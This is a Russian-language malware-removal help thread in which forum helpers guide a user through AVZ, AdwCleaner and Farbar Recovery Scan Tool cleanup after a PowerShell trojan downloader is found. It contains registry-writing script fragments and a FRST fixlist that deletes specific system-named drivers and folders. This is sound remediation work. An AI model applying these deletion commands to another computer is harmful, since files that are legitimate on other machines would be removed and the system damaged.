RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
RebootWindows(false);
end.
[/CODE]
После выполнения скрипта компьютер перезагрузится.
- Подготовьте лог [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]AdwCleaner[/URL] и приложите его в теме.
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
Найдено новое вредоносное ПО:
[CODE]Trojan-Downloader.PowerShell.Agent.fy[/CODE]
Сразу после hijack фикса порт 445 стал доступен.
Выполнил скрипт AVZ и прикрепляю лог adwcleaner.
Смените все пароли и переходите к следующим инструкция.
- Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]"List BCD"[/i] и [i]"Driver MD5"[/i].
[img]http://i.imgur.com/B92LqRQ.png[/img][*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]
farbar не запускается, выводит ошибки о том что не может создать ключи реестра.
[ATTACH=CONFIG]673891[/ATTACH]
На всякий случай сделал заново логи autologger-ом.
Попробуйте собрать лог в безопасном режиме.
В безопасном режиме тоже не получается. Вылазят те же самые ошибки.
Не смотря на вылезающие ошибки, программа запускается. Прикрепляю логи.
Сами устанавливали ограничения в групповой политике?
[CODE]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
[/CODE]
[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
File: C:\Windows\System32\DRIVERS\smbdirect.sys
File: C:\Windows\System32\drivers\rt640x64.sys
Folder: C:\Windows\pss
Folder: C:\Users\Administrator\AppData\Local\DBG
File: C:\Windows\SysWOW64\pcimsg.dll
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]
[QUOTE=SQ;1488758]Сами устанавливали ограничения в групповой политике?
[/QUOTE]
Насчет windows defenderа - я с ним ничего не делал. Может касперский автоматически его блокирует?
firefox-у через групповые политики запрещен update.
прикрепляю fixlog:
Что с проблемой?
Проблема решилась сразу после того как я пофиксил hijackthis.
В завершение:
1.
[list][*]Пожалуйста, запустите adwcleaner.exe[*]В меню [B]Настройки[/B] -[B] Удалить AdwCleaner[/B] - выберите [B]Удалить[/B].[*]Подтвердите удаление, нажав кнопку: Да.[/list]
Переименуйте FRST.exe (или FRST64.exe) в [B]uninstall.exe[/B] и запустите.
Компьютер перезагрузится.
Остальные утилиты лечения и папки можно просто удалить.
Удачи Вам.
Спасибо, большое